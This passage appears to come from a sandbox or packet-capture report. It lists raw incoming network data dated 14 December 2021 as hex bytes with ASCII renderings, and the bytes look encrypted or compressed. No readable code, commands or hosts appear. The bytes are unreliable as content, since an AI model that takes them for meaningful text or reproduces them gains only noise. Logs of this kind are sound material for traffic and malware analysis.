d4 d4 7b eb 2c 3b 33 77 42 e7 0c 16 15 7f 06 e6 98 83 9f bf 5b e2 a1 bc f8 01 b2 0c 8a 0d 1e 6b 12 7d 71 0f 8e 3c ef 86 65 19 83 ed
                                                                                                  Data Ascii: >L&{q``8 !:?2l]RSB)$y&UAp*F/-0;2?^8$2u7bv+<%uR[-$8PBOp%Np=x_7)\:Y-joN"<:B{,;3wB[k}q<e
                                                                                                  2021-12-14 15:13:05 UTC183INData Raw: db c3 25 43 69 f2 d3 75 41 64 97 c7 33 50 f3 2a 1a ee f9 82 e4 91 14 8b 38 26 01 59 ab 50 60 0b 8e f2 73 1d 9b ef f3 24 59 92 43 6d c4 f8 16 9b 0e 51 70 10 82 53 b8 70 47 c9 57 dc 06 3f a7 71 38 67 c4 b1 88 ff ff 77 26 4a 62 b5 c8 c4 cd 39 4a 16 4f d5 a5 d8 96 97 01 e3 49 7f 75 7d 8f 1d 14 be fa 94 39 5e a3 6f eb 0b ea 9a 34 d8 43 e1 d6 0c 92 31 9c 27 90 71 96 d5 7f 3b e0 ee 09 12 89 49 e9 e8 89 cc 7b fc 03 ba a8 83 f2 2e 0a 9e 3c cd bc a4 7a 7f 3e c5 39 82 c0 6e ba f7 4c d4 0b a2 82 b4 ae 2e 3c 0b a5 c9 5a 77 9d 8d 53 0c f3 7e e7 a0 d3 6c 61 39 88 40 53 5f b0 da 51 06 86 d5 20 ee d9 76 0f d7 94 28 a0 ae f2 c0 b6 69 2f b0 70 bf 76 78 23 25 a1 8d 5e 29 8a bf b3 6f d8 df bd 86 e0 b6 5c 84 3a 82 ed 99 89 aa 01 78 52 49 ec 76 b4 44 fc e3 1e fe f6 c6 86 f8 00
                                                                                                  Data Ascii: %CiuAd3P*8&YP`s$YCmQpSpGW?q8gw&Jb9JOIu}9^o4C1'q;I{.<z>9nL.<ZwS~la9@S_Q v(i/pvx#%^)o\:xRIvD
                                                                                                  2021-12-14 15:13:05 UTC184INData Raw: c4 09 f6 b5 ca a2 94 63 db 80 4e 3d b0 94 58 3d a0 ee 22 ee 54 9e db bc 68 3a e1 f9 63 7c 31 8a 73 6b 73 52 3e a6 04 44 96 a6 3c a9 8b 4e 55 2a 05 14 e6 91 96 ec ac 29 86 3f 99 3a b5 87 be 35 be 61 60 41 7f a6 50 c8 7a 0d 84 ec 6e 2f 5d c9 1a eb 4c 28 a4 fd 45 d3 70 78 8f 17 e8 8a 3a 4d 1a 05 51 10 f3 aa 4b 04 43 84 d8 53 e5 cc c7 3c 43 af 6b 0c ec fe d0 6b 06 89 a2 29 25 4c 55 9a 46 39 25 e9 30 3c 3f 0d cc 0c 6e 42 0e bf c8 a5 ee 60 77 13 de 31 bb 5d c2 00 50 18 ce 60 88 aa e2 0c 76 12 ae fb f5 51 93 53 a1 8e 1e 00 c3 83 5b 61 9b cb 92 e4 c2 12 e9 a7 fa 02 40 47 4f 98 99 ee 37 77 c3 53 37 10 4c 6f c4 68 78 f1 e9 6e f0 ed cf 1e d7 d4 aa ab f1 40 eb a8 50 67 e2 53 75 3a fc 2f 81 39 d9 3d 6f f8 f9 c4 d1 f8 09 42 7d fe fe 4e d2 d4 d4 0b e9 0d 86 52 d5 d1 05
                                                                                                  Data Ascii: cN=X="Th:c|1sksR>D<NU*)?:5a`APzn/]L(Epx:MQKCS<Ckk)%LUF9%0<?nB`w1]P`vQS[a@GO7wS7Lohxn@PgSu:/9=oB}NR
                                                                                                  2021-12-14 15:13:05 UTC186INData Raw: 24 e1 80 84 43 89 4d 19 49 fb 8b 10 9b 9d b1 08 a7 6f b8 fa 4f 0c 82 38 0a 19 9c 27 2c 70 62 6e ad 83 9e ba 57 c3 91 3f 14 31 4c 43 cc ca c5 a5 50 ea b5 fc 93 81 64 e7 a9 16 41 65 24 97 59 33 c4 86 df c3 14 53 25 99 04 ae 26 cf 92 59 f0 22 53 6e 7d 48 69 72 1d dc 51 2e 70 85 5d b1 de 4a d9 c0 49 3a 48 9a b3 1e ff 8a f5 c0 a9 1a 53 4d fc cf 68 14 14 d9 d5 49 4c 70 bf 4d 05 e2 47 77 0e d1 1f 82 be 5f 16 df 40 d8 89 22 33 e8 0e 6a da d5 e1 c0 99 74 cd d0 c1 7e 49 94 60 21 39 76 ee 0f 92 6f 0d 92 0e 86 f7 79 2b 5d b8 3e 83 b8 bb ec da 73 2b 90 9f 78 86 60 c7 af 82 c6 ef 5c 85 37 32 46 99 80 af f1 2c aa 0b d1 5c bc 97 d4 6b 20 37 f1 43 b8 a2 45 6c 22 b8 6e c2 2f b9 21 e1 53 59 d9 d7 b6 ee 47 e3 e9 1f ef ce 17 95 f0 41 e9 6b b9 b0 c1 3e 90 b9 5f c3 74 b6 5c 8b
                                                                                                  Data Ascii: $CMIoO8',pbnW?1LCPdAe$Y3S%&Y"Sn}HirQ.p]JI:HSMhILpMGw_@"3jt~I`!9voy+]>s+x`\72F,\k 7CEl"n/!SYGAk>_t\
                                                                                                  2021-12-14 15:13:05 UTC187INData Raw: fc f3 a8 db 16 c5 6e 8f f3 92 df c3 ab 63 44 95 e4 2e b6 fc 1c a2 7c 9c 0d 3a b2 3c 06 b6 78 40 7d e2 65 20 ca 8b 9c e1 e0 96 6a da a9 fd cc f1 53 be 9a d5 19 0f 7e 56 f2 d3 42 ff fb a2 50 9d 80 4e 4b 22 13 5e 41 3e b7 93 36 ee a3 d9 b2 f7 d0 0d 71 04 0d e7 4f 33 e3 70 34 61 a3 cf 30 23 e7 bd 72 a8 ba f4 88 02 d5 91 dc 04 c4 32 c8 60 33 5e f0 8d 5b 87 67 43 36 38 5b b1 3a 8d 56 e9 39 88 6f d9 45 b6 b3 aa 2c b1 7c 40 40 c8 7b 70 e5 fd a9 96 80 15 25 f6 33 f5 5f 05 d8 35 b1 f4 71 b0 41 3b 9e 2a fb 31 e5 3f 51 49 4b 1c 9c e8 db a5 b6 b0 53 74 09 c5 3b 2e 3c a7 00 95 57 b0 09 09 6d ff 8a 76 63 39 d2 cc 4b 75 30 dd 0e aa 0b c2 02 5a 67 1d 95 0a 67 25 e3 bf c3 3b d9 43 88 6b d1 0e 7f 73 d7 2e 3b 49 a9 ae b8 d6 ec 7b 30 7e 18 1d 64 2a 85 ab b2 86 69 f0 d9 ea 21
                                                                                                  Data Ascii: ncD.|:<x@}e jS~VBPNK"^A>6qO3p4a0#r2`3^[gC68[:V9oE,|@@{p%3_5qA;*1?QIKSt;.<Wmvc9Ku0Zgg%;Cks.;I{0~d*i!
                                                                                                  2021-12-14 15:13:05 UTC188INData Raw: 66 68 3b 4c c9 d3 3c 8c ab 25 e9 52 37 39 03 83 0a 45 12 fc fe 9e 79 af 30 5a 3e cd 04 50 62 5a 70 97 0b 59 55 c9 e7 48 b0 4e 30 fa 63 1d d4 7e 57 e1 4a ca 0b b9 01 7c 22 15 d1 5c 48 5a 75 58 99 e7 49 a2 ca 9f 13 c1 b1 65 5d f3 9a 31 d0 71 ec ce 8c 50 52 2a 7c e5 75 81 5f cb 33 8f c9 25 0e 46 16 56 87 0d 73 e7 18 59 68 ec 81 33 ea 96 a8 65 8b e5 4e 9f e3 14 0c 33 cb 52 cf 73 4d e6 2c d7 ca 3f 46 34 fe 6e 2d b3 b3 f5 22 66 29 4a 96 a0 84 88 7e 39 dd 16 0a dc f8 da f0 80 ca e7 e9 3e e5 4e 55 14 6b bc d6 95 38 55 8a 6f 0a 46 6a 9d 9d d8 72 c9 19 0a 25 31 c8 02 c0 30 3d d5 82 10 5d e4 83 04 9f 79 ad e2 08 8a 04 e6 3c b0 97 83 38 38 a5 9d d0 cc 05 e2 3e 75 37 c1 3d b1 8d 73 45 f1 18 f1 f8 e0 b1 b0 b3 38 36 01 f0 ce 95 50 5c 89 b3 4b d6 6d 44 aa 6c 68 0b 0b 7d
                                                                                                  Data Ascii: fh;L<%R79Ey0Z>PbZpYUHN0c~WJ|"\HZuXIe]1qPR*|u_3%FVsYh3eN3RsM,?F4n-"f)J~9>NUk8UoFjr%10=]y<88>u7=sE86P\KmDlh}
                                                                                                  2021-12-14 15:13:05 UTC189INData Raw: 48 af f0 69 04 95 16 07 41 e3 24 ca 60 c8 aa 45 8e 34 04 f3 bb e8 6b 59 64 10 97 8b 62 d0 62 c3 70 cc 74 19 bf e1 f6 59 d5 b2 1c 9a a8 02 bc 18 30 81 87 02 5a 87 b4 22 a6 9e b2 18 bf fd e8 e0 e7 c2 b0 b8 28 8d 1a 1e 50 b7 6d f3 2b 4a f9 97 49 39 34 95 99 28 74 ee 53 ab de 89 72 bc 97 08 61 dc d4 7f 1f 99 ea 2d 30 54 ba af 5d 53 b2 a6 5e 8f 01 59 b7 7a 87 01 3d 93 91 ed e4 1d 21 25 75 3e d9 d3 59 20 17 61 a8 55 ad bf 1f ca d3 20 dd a5 7d 2e 25 e5 49 ee 1a 2f c5 de dd c6 c9 2f a4 32 fb 8a 4d 4c f3 21 a5 08 9f ab ed 4d 34 82 c9 52 2b e6 89 3d e4 af 9e 28 c5 a8 db 6e 16 9d 27 29 d6 48 62 ba 8a 23 69 bd d6 12 e7 0e 2b 0a d8 6c 5f a7 1c a5 99 17 b7 09 e7 32 70 54 aa 19 07 1a 4f 60 16 e3 1c 0c 5f 37 2b fb ed 59 5c 74 a4 89 43 52 eb 8b d9 66 f1 cb c5 c8 0a 11 c5
                                                                                                  Data Ascii: HiA$`E4kYdbbptY0Z"(Pm+JI94(tSra-0T]S^Yz=!%u>Y aU }.%I//2ML!M4R+=(n')Hb#i+l_2pTO`_7+Y\tCRf
                                                                                                  2021-12-14 15:13:05 UTC191INData Raw: 92 cf 87 84 85 c6 33 4f 0b 87 29 87 5c 4d c3 8b ee ad 97 2f 3b 6c 54 88 49 df 0c 83 55 41 46 79 0e 64 83 00 51 29 25 50 3b fb 53 75 6b d5 9c 99 49 c1 f6 c1 fd b1 dd b6 04 9c 6a 35 83 0b 41 c5 8c 0d ff 48 1e d7 bd c6 1b de c4 99 a1 3e 3e fc 37 10 bd 9f 2d 0f 06 14 b4 fe 66 0e ec 1e 5a 34 93 22 2c 6a ef 1b 5e 84 b0 a9 58 c4 68 16 8f 29 11 47 75 95 ab b5 43 ea 4a ff 7d a8 02 e9 8d 17 0b 2d e8 93 1d 32 7b a3 1a f3 be 50 71 bc fc f3 0d ce 9d 51 d8 0a 43 6c 71 53 b7 71 a9 85 4d 3d b5 ad 8f b0 f4 73 bd c5 70 3b 06 f6 6b 19 b3 8b af ee 66 1e bc 4b f6 e0 f0 62 42 d8 fc 6c 1a 7b d9 7d c9 e8 b8 70 74 8b 60 92 63 77 dc de 90 f0 41 21 12 e9 e7 2e b7 d3 bd c1 25 7c b1 e6 7b 7d 1d b1 c6 7f 02 75 34 24 9f 46 72 97 9f 92 a4 78 c5 00 0a 2d 20 91 71 ed 8d 64 0a 95 86 79 dc
                                                                                                  Data Ascii: 3O)\M/;lTIUAFydQ)%P;SukIj5AH>>7-fZ4",j^Xh)GuCJ}-2{PqQClqSqM=sp;kfKbBl{}pt`cwA!.%|{}u4$Frx- qdy
                                                                                                  2021-12-14 15:13:05 UTC192INData Raw: d5 5a 1e 94 76 e0 ec 1f 3e 70 52 d0 73 7b 56 e1 cb 2c 08 f6 55 65 84 21 67 1f 6b 60 ad 5b 9b d6 fd 24 c9 a2 c9 61 a8 c3 bc 5b 9f 4f 7c 67 c1 8f 7e 9c e1 8b 3f 17 58 8d 2f 58 11 a4 3b a6 c8 b0 b6 24 c6 59 d7 3b 4e f3 e4 c7 42 c4 d4 8f 86 99 28 c1 4b 63 e4 be df 2c d4 fd 38 af b6 9e 6f 3b f8 31 fd b4 b8 40 dd c9 7b 22 8b 8b 9e c4 b6 96 e0 db 9b d8 11 f3 11 be 44 dd ab 0d 3c 56 1d db f9 fe b3 a2 b8 85 78 4d 2a 22 11 71 17 3e 07 92 8f fb e5 da 0a f6 9d 26 3e 07 b7 e6 82 00 f1 73 be 60 fe e4 44 21 16 bc 1e be 24 f6 82 02 44 b6 c9 05 ce 32 ae 6c 32 5d 29 8c c0 8b 6b 42 1c 38 50 a8 6c 8d 17 e9 a1 ac 08 da 04 b6 01 8e b7 b1 75 40 97 d8 4e 73 ec fd 10 a5 e8 16 4c f6 87 d2 2e 06 c9 35 3a d7 50 b3 f8 3a 2a 18 a6 32 5c 3e 26 5a 49 1f c5 e9 96 b5 e0 b0 92 74 38 de 74
                                                                                                  Data Ascii: Zv>pRs{V,Ue!gk`[$a[O|g~?X/X;$Y;NB(Kc,8o;1@{"D<VxM*"q>&>s`D!$D2l2])kB8Plu@NsL.5:P:*2\>&ZIt8t
                                                                                                  2021-12-14 15:13:05 UTC193INData Raw: a1 c5 76 4c d0 8e be 6a 8a 59 b7 4a 3b 32 fd 98 82 ec fe 0d 73 c4 97 58 be 85 63 c5 22 55 04 9b 9c fa 77 2b f9 16 46 a5 c7 8a 32 cd bd f3 84 a5 a2 02 47 06 af 56 60 c5 82 a7 a9 80 3a 17 76 5b 41 8f af 2b 52 bb 00 78 77 44 5a cd f8 9a 8d 33 f1 4d 9d 30 ee 82 d3 58 96 cc 2c b7 a7 8c 30 52 68 eb 19 4f 2a 4e 1b ba df 7a e1 c2 d7 5d 4b 43 19 df 42 35 db 55 9f cc c3 cc 86 93 fa 4f cd 39 f4 42 1c 7a df 7b ca cd 33 af 8c 99 8f df c3 41 44 ff f1 3f 43 64 41 ce 67 5e ea 23 39 ef 46 8c e5 d4 a2 a8 fa 28 95 59 37 52 85 09 f1 f2 54 58 9c ef f1 24 c9 92 5e 66 20 fa 6c 9b 43 14 70 10 8d 53 25 70 87 cb a5 de 76 3f c3 34 2f 67 c9 b1 1c ff 9c 63 cf 48 1e b5 58 81 c0 39 48 16 a4 d5 58 da 72 95 02 e3 f3 3a 76 7d f0 1d 91 be 5d 80 c1 5d cb 6f 21 4e f7 9b 21 d8 d7 e1 e0 0e 63
                                                                                                  Data Ascii: vLjYJ;2sXc"Uw+F2GV`:v[A+RxwDZ3M0X,0RhO*Nz]KCB5UO9Bz{3AD?CdAg^#9F(Y7RTX$^f lCpS%pv?4/gcHX9HXr:v}]]o!N!c
                                                                                                  2021-12-14 15:13:05 UTC194INData Raw: 50 c1 1c 5a 08 0d ca 09 46 25 79 94 a5 38 f3 43 2c 4f 99 0f 4a 73 17 25 53 4a b5 ae 50 c6 69 78 57 7e 03 35 ed 29 f3 ab bb ae f9 f3 b0 ea c7 c6 65 9a b6 92 49 81 2e a7 98 da 4c 6f fa 6f 3c 3f 89 ef 41 00 07 b8 6e d0 d6 d4 f1 7e 78 2e 47 33 28 79 90 0c 14 15 15 07 cb b9 64 9d 3f 5a 50 9b bc f8 ff b3 e3 8a 05 1b 72 11 79 71 eb b4 1d ed fd 65 8e 83 be 54 30 a8 1d 9b dc 84 bc da c2 fc b0 51 71 5a 65 fb e9 a8 a8 74 3c ba 31 f2 8d b5 a5 29 e4 7c d3 d0 8f 85 74 44 c5 b7 50 f6 7f f7 cd 86 f7 ca 9d 79 91 93 69 1c b4 ac 6d 26 64 b0 fa aa 53 73 1a c8 48 87 12 c3 bb 48 87 84 56 80 91 4d 7a 86 34 ac 6f 2c a2 43 06 a9 cd d8 65 a2 e9 41 d6 7e 72 71 d7 00 05 31 3f 79 8f e1 f3 6b 70 c0 14 84 5a c4 fa db 3e 96 b3 b7 c1 b1 45 31 a3 0d 92 d3 35 2c 04 4f c4 c5 38 e6 ad de f1
                                                                                                  Data Ascii: PZF%y8C,OJs%SJPixW~5)eI.Loo<?An~x.G3(yd?ZPryqeT0QqZet<1)|tDPyim&dSsHHVMz4o,CeA~rq1?ykpZ>E15,O8
                                                                                                  2021-12-14 15:13:05 UTC195INData Raw: 57 ec d6 4d dd 9c 04 bb f7 8c 0c 37 5f ab cb ee a3 0b 3c c4 31 9d 08 8d f3 c0 ce 1f aa 43 9c 8b ff 26 a8 cc 17 7b c3 7e a6 c4 33 0d 52 47 5d 70 2e 34 46 ee 3d 63 ea e6 84 ee 0a 1c 8a a7 86 5b 7a 8e 84 ee e1 00 d7 83 f3 a8 e5 09 3b 57 45 f9 5c 7b ef de 41 3a 79 b2 2f b7 af b6 f1 ad 6d cb 83 ed 2c 98 26 33 d1 2a f5 3f c1 77 cd d1 1e aa 0f 8f fa 88 d5 b8 ba bb 0f 6b 7e 12 a3 44 b8 4b 8c 49 f4 ad a6 79 94 42 ed 12 a6 c9 81 29 bf 7d 36 1e 06 03 15 22 cb 8d 79 45 e7 56 5f 46 0e a1 18 e3 82 17 00 95 96 cc 3c d1 1c 2e ae 86 5d 74 aa f1 46 27 60 5f b3 f8 1f 84 3d 53 ab 0e 6b e6 fb 2a 7f b6 8a 42 f0 c2 59 7a de 44 96 7e 1a 22 d1 6a 39 d3 94 67 a9 cc ce 50 5b c3 da 16 45 1b b6 03 ae bd e8 bd 43 c0 74 63 ac cf ba 32 69 a4 27 95 bd 88 c4 17 e2 6f e7 09 38 b2 b2 ea 6b
                                                                                                  Data Ascii: WM7_<1C&{~3RG]p.4F=c[z;WE\{A:y/m,&3*?wk~DKIyB)}6"yEV_F<.]tF'`_=Sk*BYzD~"j9gP[ECtc2i'o8k
                                                                                                  2021-12-14 15:13:05 UTC197INData Raw: 78 16 e8 ff e1 a5 f3 66 75 57 8a 31 68 09 a6 44 e2 1a f4 34 08 b0 b4 0c 17 46 38 99 bd 58 16 05 dc ea eb 52 a4 d7 5b 07 59 cb 6e b2 24 52 c1 a7 7b 05 42 03 1a 98 4a bb 72 3a 70 51 0d 45 af 75 93 68 19 a4 7f 0c 60 ef 4a 49 aa b0 fb f8 96 15 eb ce 93 67 fd 12 93 7a d7 2f e4 3c db 79 39 f8 2a 92 3e bc b9 40 47 a8 b9 55 86 d4 b3 6e 0b 52 67 10 33 a0 1d 91 53 5f 43 e9 67 ea b9 07 cb c2 38 71 9b da ae 01 d7 cc 8a 62 4d 8d 77 56 71 ab e3 3e ac d1 65 cb d4 9a 13 1c a8 59 cc f9 c1 96 da 8b ab 96 32 5b 5a 05 ac ce c9 80 74 59 ed 19 95 a5 b5 c1 7e cd 19 05 d0 cd ed 2c 11 44 fa 25 80 42 b3 ef ee 89 8f 6b 2c da d5 00 1c c9 f7 d8 66 0d b0 ff f1 e4 31 73 c8 4d dc ab 8f d2 48 a2 df ed e6 fd 4d 6d dd 08 cb 0e 2c bf 18 a9 cf d8 d8 42 fe 46 03 d6 7e 60 31 a5 44 21 28 09 39
                                                                                                  Data Ascii: xfuW1hD4F8XR[Yn$R{BJr:pQEuh`JIgz/<y9*>@GUnRg3S_Cg8qbMwVq>eY2[ZtY~,D%Bk,f1sMHMm,BF~`1D!(9
                                                                                                  2021-12-14 15:13:05 UTC198INData Raw: 0b 45 4e 9b ff 40 87 98 8e a4 6a 74 75 88 4b 19 79 fb b1 1a 3b 26 8f 6b 60 06 25 f3 a5 eb ee 1c fc 40 c8 47 f3 cc 42 bf e8 33 a8 f3 8f 35 10 5a a0 af c1 a9 14 2c 87 54 a7 37 8d ef da e3 41 ce 6e d1 89 d5 05 88 e8 50 07 9e 1a 82 a0 1d 01 4e 60 01 26 4b 5f 44 f9 27 59 d3 bb df 8d 28 11 8c d5 8e 4d 61 b7 b2 a9 d1 2c d7 d4 a8 c9 fe 2f 30 4c 15 a4 38 4c 8a f6 56 3b 55 a4 2f d1 f3 df c6 ad 5c e7 ed cf 7e df 4a 15 f2 39 f4 13 af 64 9b 97 41 8b 13 a3 c7 99 96 eb c8 91 1e 77 6e 1c a3 55 b8 69 b9 52 e3 a8 94 0a b5 5f d1 13 bc c3 bc 2d bd 65 24 4d 72 3f 33 7e a7 bd 73 62 fa 4a 4e 15 3a c7 2f 86 a5 01 26 96 ab 97 69 b6 2d 41 b4 8d 47 26 d3 94 78 10 34 38 84 9d 33 81 01 76 88 1f 29 a3 9a 19 75 e3 82 48 e0 a1 0e 14 eb 44 f7 59 21 29 c1 3e 61 a7 a9 69 8c e1 db 02 05 a6
                                                                                                  Data Ascii: EN@jtuKy;&k`%@GB35Z,T7AnPN`&K_D'Y(Ma,/0L8LV;U/\~J9dAwnUiR_-e$Mr?3~sbJN:/&i-AG&x483v)uHDY!)>ai
                                                                                                  2021-12-14 15:13:05 UTC199INData Raw: 30 22 f1 aa 3a 07 b5 ac 49 ca d9 79 6f 98 c0 86 12 76 ec 34 6b be 23 d7 cc 54 6d 61 cb 57 3c 58 68 2e 53 7e 33 89 c9 d4 d7 e4 4b 05 76 de 42 48 29 f9 63 c0 7b c7 01 7a ac 99 7c 13 12 7f 9e 9d 0c 0c 21 b9 8e ec 3d a2 e8 3e 15 59 b2 79 83 24 63 f1 d3 67 13 2d 29 3b fd 61 9a 26 05 55 34 4a 56 c6 51 a3 3b 10 90 0d 0b 35 ac 46 71 da b5 dc 9d f3 10 9f da 92 08 c9 33 e1 4d e2 5b d2 18 be 3d 08 9d 1b 9b 77 94 99 21 72 97 d8 73 a4 97 a1 67 0b 78 5c 23 33 b4 1d 91 53 55 60 9b 74 d9 d7 11 de b7 37 53 ee cc 9d 01 f1 fb fa 70 6e ff 75 00 30 99 c4 52 86 e5 04 fb ea f5 38 09 c9 6c fe f9 c8 a0 b7 a6 b3 f4 39 69 39 13 b8 a1 c6 bb 11 5e ce 70 9f 9c f7 c6 5a a8 7e 1a a4 fa f5 09 23 26 e5 2f 85 57 9a e8 f1 89 ca 54 1e ae c5 3d 6f fa c0 b6 51 30 b0 f9 c5 8b 04 4e c8 4e ed d8
                                                                                                  Data Ascii: 0":Iyov4k#TmaW<Xh.S~3KvBH)c{z|!=>Yy$cg-);a&U4JVQ;5Fq3M[=w!rsgx\#3SU`t7Spnu0R8l9i9^pZ~#&/WT=oQ0NN
                                                                                                  2021-12-14 15:13:05 UTC200INData Raw: 79 ff cd 04 c0 00 78 b5 2e e6 cf 5b 2d 16 ba b2 49 be 17 95 1b 86 94 65 3d 0d ea 7a 82 d8 38 80 b8 3b de 3c 59 3d 9c ff 59 f6 81 89 b2 6a 15 57 88 49 1b 34 e7 b0 0b 64 26 8f 6b 60 06 25 f3 e8 ca ef 0e b0 62 ce 5b c1 d1 43 88 f5 2f aa 92 b7 2c 39 06 80 c1 e1 a9 1d 35 9b 56 d4 03 81 f4 f1 c0 4d c5 6f b8 a4 db 75 b3 f4 51 3e 94 13 c9 e4 37 0d 55 47 00 25 00 16 4e fd 34 6f e8 b2 b6 a8 35 1a 84 97 88 5b 70 de c4 93 c2 1b d0 de a6 a8 c4 15 1c 44 05 ae 6a 1d d9 cb 57 06 5e bb 5b c1 ee d5 c4 b2 5d c6 8c ed 7e f9 52 13 dd 25 f6 76 fa 6d 9b 90 7d 9f 10 a3 d0 9d 92 eb e9 84 18 7b 46 14 cf 75 b2 6c 83 4c e9 ac f0 2a a4 59 e7 08 a8 a6 a8 2d b9 54 24 45 70 3b 01 74 9b ab 79 76 c7 54 4e 23 4e d3 23 e8 84 73 0a 94 8f 8a 69 a3 2d 12 93 9a 40 2c f9 f1 5f 0c 06 2b 93 f4 10
                                                                                                  Data Ascii: yx.[-Ie=z8;<Y=YjWI4d&k`%b[C/,95VMouQ>7UG%N4o5[pDjW^[]~R%vm}{FulL*Y-T$Ep;tyvTN#N#si-@,_+
                                                                                                  2021-12-14 15:13:05 UTC202INData Raw: 66 de fe be 6a 61 32 ce 09 5b 02 9a e9 88 fe 5c 2b 8b 41 83 da 46 f9 78 8b e5 c0 4d a9 61 c3 4d cb c4 d0 37 2d e1 8b 20 1f cc be 56 a5 ee 7b 0c b3 c1 d2 2e 6b 89 72 44 d7 0a de 98 73 54 18 fd 5b 50 5a 5e 2e 7e 7a 24 85 bd d2 c0 c4 6d 37 72 ad 54 7e 29 d4 67 d7 77 b3 27 6d 8c b2 69 05 62 57 95 9a 3d 26 25 ae eb de 3f c1 c7 3e 07 61 aa 7d 83 77 64 e6 c2 59 3d 42 20 2a ec 50 ab 1c 18 6a 37 19 64 dd 58 a7 05 78 b2 0d 17 45 9b 46 4f de a6 cb 99 9e 40 ac cd b2 35 ff 36 e6 5d f2 5b f4 1e a9 58 0e 95 6f 89 5b 97 80 32 79 ad cd 6f b5 b5 b9 0b 18 68 5a 19 7f 83 19 97 6d 7b 15 8e 63 c8 e6 32 cd a3 29 46 f6 be 9f 64 c6 c5 da 65 69 ec 7d 00 13 84 b4 5d 82 86 01 e2 83 fd 33 3f f7 56 ef 9c eb c1 a9 a6 88 c9 1a 78 3f 0a fb 98 cb a2 18 49 fd 7c 84 bb c1 c2 44 cd 19 37 a4
                                                                                                  Data Ascii: fja2[\+AFxMaM7- V{.krDsT[PZ^.~z$m7rT~)gw'mibW=&%?>a}wdY=B *Pj7dXxEFO@56][Xo[2yohZm{c2)Fdei}]3?Vx?I|D7
                                                                                                  2021-12-14 15:13:05 UTC203INData Raw: 9f 34 36 ed a0 86 50 80 f4 0b 07 4c 9d 0e de 32 77 17 60 f6 3a 41 1e 85 8a c3 b9 0e 52 a7 5a 4e 29 b1 dd 72 ba f2 00 a5 38 6b dc 20 ef cf 70 24 60 b8 b9 20 be 3f e5 19 91 81 4e 1e 12 e1 58 fa dd 3a f0 ab 35 b1 01 20 1d 87 f9 5f bd a1 a4 b8 6c 11 43 95 4e 13 5a 94 94 0d 5c 03 83 6a 6a 1b 0e ec 8b e1 fa 0d 95 6c d4 3e e4 dd 59 b3 d8 24 be f1 90 11 0f 4a ac c0 ec c6 0a 39 81 6e 90 21 97 e3 c6 c7 5e de 62 be a4 bc 12 85 f9 7d 19 85 1f 93 d5 36 28 47 5d 0d 30 47 2f 57 f5 3c 68 86 86 cf 9d 33 10 84 fb bb 5d 7b 9c 99 ad d3 47 fa df af db e4 08 3f 4c 18 ae 38 6c f2 da 46 1a 44 b5 34 ea 9d f3 cb b4 51 f0 82 f7 1f f9 52 13 dd 25 f6 35 c0 6e 8e 82 6c 97 13 a9 fa fc b4 ff d4 f0 0d 77 5c 2c 8c 45 af 77 a6 45 ff 89 fb 0e be 2b e9 03 bb f9 bc 20 a4 62 22 67 63 23 31 7e
                                                                                                  Data Ascii: 46PL2w`:ARZN)r8k p$` ?NX:5 _lCNZ\jjl>Y$J9n!^b}6(G]0G/W<h3]{G?L8lFD4QR%5nlw\,EwE+ b"gc#1~
                                                                                                  2021-12-14 15:13:05 UTC204INData Raw: 50 14 31 4a e1 e0 21 9a d4 bf d9 f6 1a 49 3c 62 7a 83 e3 69 8f 23 7c 12 5c 89 5f 54 b3 ce 35 fb 0f 95 2e 66 c2 c4 9a 66 7f 53 d0 09 5b 38 bb 8c ae e5 5a 27 8d 38 91 c1 5d ce 78 86 fc c9 3f ae 61 c5 12 cc c3 df 34 33 fd 9e 3c 01 a1 9d 4f d1 c8 64 0c 90 c9 a6 34 45 e6 59 59 a2 39 d6 ea 3b 6a 7d c9 44 59 4d 4e 35 61 6f 30 9c d8 c7 a5 d7 57 01 4c 9a 5f 5e 0f c3 71 d9 76 c5 05 7a f8 93 69 02 4d 7c 95 9a 0a 10 22 b3 e2 c9 37 b3 83 08 04 79 88 65 8f 54 72 fb c6 4a 34 14 2e 2a ef 6a 9c 72 28 4a 1d 25 67 ca 4f c6 0e 0a f1 18 1c 35 ac 41 6e aa 90 c7 8a f3 06 87 c7 a9 15 9a 04 e1 5d e0 5b c2 3a a9 52 05 9d 0c b0 7b 88 9d 2f 72 fe fa 71 b5 b5 a6 5b 0d 62 44 23 50 a7 3d 97 7e 79 67 e9 55 d9 cd 35 ef ad 31 42 f8 ca bd 73 c0 f5 f8 04 48 e2 73 6b 14 9d f1 4c 9d e9 17 8f
                                                                                                  Data Ascii: P1J!I<bzi#|\_T5.ffS[8Z'8]x?a43<Od4EYY9;j}DYMN5ao0WL_^qvziM|"7yeTrJ4.*jr(J%gO5An][:R{/rq[bD#P=~ygU51BsHskL
                                                                                                  2021-12-14 15:13:05 UTC205INData Raw: f0 9e fe af b0 41 57 9d 5d 45 22 0d f9 b4 a5 13 85 4d 8a 89 f6 f1 8c bb 78 f8 38 75 ee 2a 47 37 eb 27 a7 97 29 2c b7 bd 96 43 ba fe 38 14 67 82 1b e9 2f 67 01 79 ed 3d 5d 70 e2 ae c5 81 32 51 a1 58 4f 03 a1 f8 70 b8 e6 0c a2 29 73 fa 3f e4 bd 58 3e 7f b6 bb 3a da 03 f0 08 bc a9 54 14 11 fa 79 e7 f7 31 c7 b3 33 bc 0e 4c 01 98 ff 46 b9 a1 88 af 61 07 33 b2 5e 0f 40 f1 b8 51 78 19 82 63 61 0c 3f fd 87 ea f9 79 8f 66 ce 61 ce d9 55 85 f1 34 a0 d3 97 0c 10 53 a4 db eb a5 2b 39 91 58 a6 21 87 f4 dd c1 40 d9 0b 82 be ce 1c 8e ea 71 3a 9d 17 93 ef 35 18 4b 41 00 31 2e 0d 46 fb 36 7e c9 a5 c2 87 28 1b 9a d5 8e 4d 61 b7 b7 b2 d9 1c c9 c3 c1 cf f5 0e 01 66 1e aa 2e 5a 8a f8 40 1b 73 b4 3a f6 ee b6 e2 a7 4c cb 80 f8 78 cf 63 0f d7 24 f5 13 dd 70 fe b0 67 8d 14 a3 f9
                                                                                                  Data Ascii: AW]E"Mx8u*G7'),C8g/gy=]p2QXOp)s?X>:Ty13LFa3^@Qxca?yfaU4S+9X!@q:5KA1.F6~(Maf.Z@s:Lxc$pg
